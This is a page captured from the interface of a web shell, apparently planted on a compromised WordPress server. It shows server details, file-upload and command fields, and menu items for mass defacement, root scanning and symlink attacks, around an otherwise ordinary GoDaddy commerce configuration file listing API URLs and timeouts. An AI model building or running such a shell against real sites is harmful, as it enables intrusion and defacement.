AnonSec Shell
Server IP : 104.21.14.48  /  Your IP : 18.216.86.171   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/wp-content/mu-plugins/vendor/godaddy/mwc-core/configurations/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/wp-content/mu-plugins/vendor/godaddy/mwc-core/configurations/commerce.php
<?php

return [
    'customers' => [
        'api' => [
            'url' => [
                'prod' => defined('MWC_COMMERCE_CUSTOMERS_SERVICE_URL') ? MWC_COMMERCE_CUSTOMERS_SERVICE_URL : 'https://api.mwc.secureserver.net',
                'dev'  => defined('MWC_COMMERCE_CUSTOMERS_SERVICE_URL') ? MWC_COMMERCE_CUSTOMERS_SERVICE_URL : 'https://api-test.mwc.secureserver.net',
            ],
        ],
    ],
    'catalog' => [
        'api' => [
            'url' => [
                'prod' => defined('MWC_COMMERCE_CATALOG_SERVICE_URL') ? MWC_COMMERCE_CATALOG_SERVICE_URL : 'https://api.mwc.secureserver.net',
                'dev'  => defined('MWC_COMMERCE_CATALOG_SERVICE_URL') ? MWC_COMMERCE_CATALOG_SERVICE_URL : 'https://api-test.mwc.secureserver.net',
            ],
            'timeout' => [
                'prod' => defined('MWC_COMMERCE_CATALOG_SERVICE_TIMEOUT') ? MWC_COMMERCE_CATALOG_SERVICE_TIMEOUT : 4,
                'dev'  => defined('MWC_COMMERCE_CATALOG_SERVICE_TIMEOUT') ? MWC_COMMERCE_CATALOG_SERVICE_TIMEOUT : 20,
            ],
            /*
             * Maximum number of UUIDs to include in an `ids` filter.
             *
             * This value is set based on a combination of factors:
             *
             * 1. If a query string gets too long, the request won't go through. Max UUIDs in this scenario is 100.
             * 2. The API also has its own lower limitation of 50.
             *
             * @link https://godaddy-corp.atlassian.net/browse/MWC-15546
             * @link https://godaddy-corp.atlassian.net/browse/MWC-15544
             */
            'maxIdsPerRequest' => 50,
        ],
        'website' => [
            'categoriesUrl' => [
                'prod' => 'https://spa.commerce.godaddy.com/categories',
                'dev'  => 'https://spa.commerce.test-godaddy.com/categories',
            ],
        ],
        'assets' => [
            'user' => [
                'login'        => 'gd_commerce_assets',
                'emailAddress' => '[email protected]',
                'displayName'  => 'GoDaddy Commerce Assets',
            ],
            'hideAssetUser' => true,
        ],
    ],
    'inventory' => [
        'api' => [
            'url' => [
                'prod' => defined('MWC_COMMERCE_INVENTORY_SERVICE_URL') ? MWC_COMMERCE_INVENTORY_SERVICE_URL : 'https://api.mwc.secureserver.net/v1/commerce/proxy',
                'dev'  => defined('MWC_COMMERCE_INVENTORY_SERVICE_URL') ? MWC_COMMERCE_INVENTORY_SERVICE_URL : 'https://api-test.mwc.secureserver.net/v1/commerce/proxy',
            ],
            'timeout' => [
                'prod' => defined('MWC_COMMERCE_INVENTORY_SERVICE_TIMEOUT') ? MWC_COMMERCE_INVENTORY_SERVICE_TIMEOUT : 4,
                'dev'  => defined('MWC_COMMERCE_INVENTORY_SERVICE_TIMEOUT') ? MWC_COMMERCE_INVENTORY_SERVICE_TIMEOUT : 10,
            ],
        ],
    ],
    'gateway' => [
        'api' => [
            'url' => [
                'prod' => defined('MWC_COMMERCE_API_GATEWAY_URL') ? MWC_COMMERCE_API_GATEWAY_URL : 'https://api.mwc.secureserver.net',
                'dev'  => defined('MWC_COMMERCE_API_GATEWAY_URL') ? MWC_COMMERCE_API_GATEWAY_URL : 'https://api-test.mwc.secureserver.net',
            ],
            'timeout' => [
                'prod' => defined('MWC_COMMERCE_API_GATEWAY_TIMEOUT') ? MWC_COMMERCE_API_GATEWAY_TIMEOUT : 4,
                'dev'  => defined('MWC_COMMERCE_API_GATEWAY_TIMEOUT') ? MWC_COMMERCE_API_GATEWAY_TIMEOUT : 10,
            ],
        ],
    ],
    'webhooks' => [
        // Commerce Webhooks Subscription API configuration.
        'subscriptionApi' => [
            'url' => [
                'prod' => defined('MWC_COMMERCE_WEBHOOKS_API_URL') ? MWC_COMMERCE_WEBHOOKS_API_URL : 'https://api.godaddy.com/v1/apis',
                'dev'  => defined('MWC_COMMERCE_WEBHOOKS_API_URL') ? MWC_COMMERCE_WEBHOOKS_API_URL : 'https://api.dev-godaddy.com/v1/apis',
            ],
            'timeout' => [
                'prod' => defined('MWC_COMMERCE_WEBHOOKS_SERVICE_TIMEOUT') ? MWC_COMMERCE_WEBHOOKS_SERVICE_TIMEOUT : 4,
                'dev'  => defined('MWC_COMMERCE_WEBHOOKS_SERVICE_TIMEOUT') ? MWC_COMMERCE_WEBHOOKS_SERVICE_TIMEOUT : 20,
            ],
        ],
    ],
];

Anon7 - 2022
AnonSec Team